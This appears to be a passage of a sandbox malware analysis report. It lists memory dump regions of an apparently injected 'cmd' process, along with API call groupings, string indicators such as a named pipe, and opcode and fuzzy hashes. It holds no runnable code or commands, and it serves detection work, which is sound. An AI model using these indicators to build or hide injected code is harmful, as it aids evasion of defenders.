                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: aed21bbc420e1b388e3d8e984acef087d2d8e85c663a69822b249977cdef66d7
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: A8515F32A44F8896EB11CF62E84879A77A1F788FD6F545124DE5A07B18DF3CC155CB04

                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 1d4058bf6d308f33c248ea1c0af037f01ad20d94d997632c3197446b10f87164
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 5751A131FC9F0855FA17DB56AC083A52260BB48BF2F4827249E7D47BE1DF38D6258248

                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 6a0ece79cf592ea995f3c1fd6984bc93a6820ef00ba1724a9e87556f37fc4945
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 0951C331F49E0851FE16DB56AC087A52260BB88BF2F9827319E3D07BD1DF38D625D608
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 0d1376538cb570799c4fdbb17197ca727b28e4adbfd95e780eecebde093e27f6
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 8331E532EC8E4896E723DF12AC4C399A7A0F788BD6F441125DE4947E34DF38C6668304
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 203eecbfd582e29e6a49be7f54b428c533bb29be48f7c5961bfe65a23e7437fc
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 9931D432E48E4896EB22CF12AC0C799A3A0F7D8BC6F945525DE4D43E24DF38C666C704
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 493205c5b0ab69850340e27d6fedd2b723199c45b1d914b9c7f81992b4b73afb
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: BB318F31ED8F498AE712DF23AC4876967A0B784FE6F4461259E8A43B74DF38C6618704
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 90ad3b12243eee247cba00e652f4e58dcc18f06929423b152f25bd164d4690bd
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: DB318431E58F4986EB12DF12AC48B5963A1B7C4FE6F5460259E4A43B24DF38C662C704
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 6bb59e44c9d766cacd25500a4641c18bee733b2f62571fe0a20bd516089998f1
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: B5D1AE33AC8F888AEB22DF25984839D77A0F7557D9F102105EE8957FA6CB34C6A0C714
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: a9fff25546c49c59133e46dfa5fa2e7d50e84f8f791943e9828ea064767a90d1
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: AED1F732A88F888AEB22CF64D84839D37A0F7957D9F902125DE8957F95CF34C6A0D714
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 29742a37f3cb22368057c1edb687a6361cd9af573a448ec6265bb64c9951c13d
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: C0D1A032A48B8C86EB60DFA5D89839D37A0F7457C9F102106EE8957F9ADF38D284C745
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 95b4fd4e5003cea539c040b0b63fb9c2aa0c7dba7a559bb9d3cd1e6968ecfa17
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: B2419233A98F84CAE765CF21E84839A77A1F388BD9F449115DA890BB68DF38C555CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 7bebb09c3b132bb2f8ec014379196882a1a6f7d7f17972ea3512d14deeaaed2b
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 5541AE33A18F84CAEB61CF21E84879A77B1F388BD9F448129DA8907B58DF38C555CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 2540d9f0e9f31276f3620984e8d2fcb6602a9160ee307012fb522512b7d9c756
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: B6115435A58B4487E712CB61F8183597770F385BD5F545315EAAA02FA8CF3CC254CB44
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 77fa7374bcdd04de2ea454ff39b265cc43cfe78872bb27dea8a4f135d5c86e08
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: DF114F36A58B4482EB11CB21F8187597770F389BD6F945315EE6A02EA8CF7CC254CB44
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 2e7c5ea62cd1e184ceb7e58ff96abfff096eee5547f5ac4a323284591541bb2d
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 2681C130ECCE4C86FA53EB669C493A967D0AB857C2F4460149A4847FB7DA38CB65C70D
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 4fb6207c609dc84d8d229e04ac08496c680218a4a3873b4fd8879841578740b6
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 79811530E8CE0C46FA53DB659D493A962D0ABC17C2F946035A98847F93DA38CB25E70C
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 77ff569980bfc6b4095d82264567d17c2bb0ce2b3689649e88338a8d3cf32a12
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 98810330E8CE4D46FB50DBE59C6D3992290AB877C2F447117A90843F9EDA3CEB468748
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409B31
                                            • GetLastError.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409B69
                                            • FreeLibrary.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409BD7
                                            • GetProcAddress.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: d1256c37387bbf3815cfec0a27ec9f998007e3dcbda0f18378901d15e44a7228
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: FE31C631AEAE4891EE13DB02AC0879527B4B754BF1F591524DD5D87BA4DF38C664C308
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439B31
                                            • GetLastError.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439B69
                                            • FreeLibrary.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439BD7
                                            • GetProcAddress.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: 207d4456724d15fcea771c1ae6519a87b208a85a76092049263219fa252733b0
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 2831C731B6AE48D1EE13DB06AC0879527A4B794BE2F991634DD1D87B90DF38C664D308
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 6801c72a2d9492a0e53ba480ea3a597c2e61822782d8af28fa006b707b5c77d7
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 40118E31A58E4486E753CB53EC5975966B0F388BE6F401214EAAE87FA4CF38C6248748
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
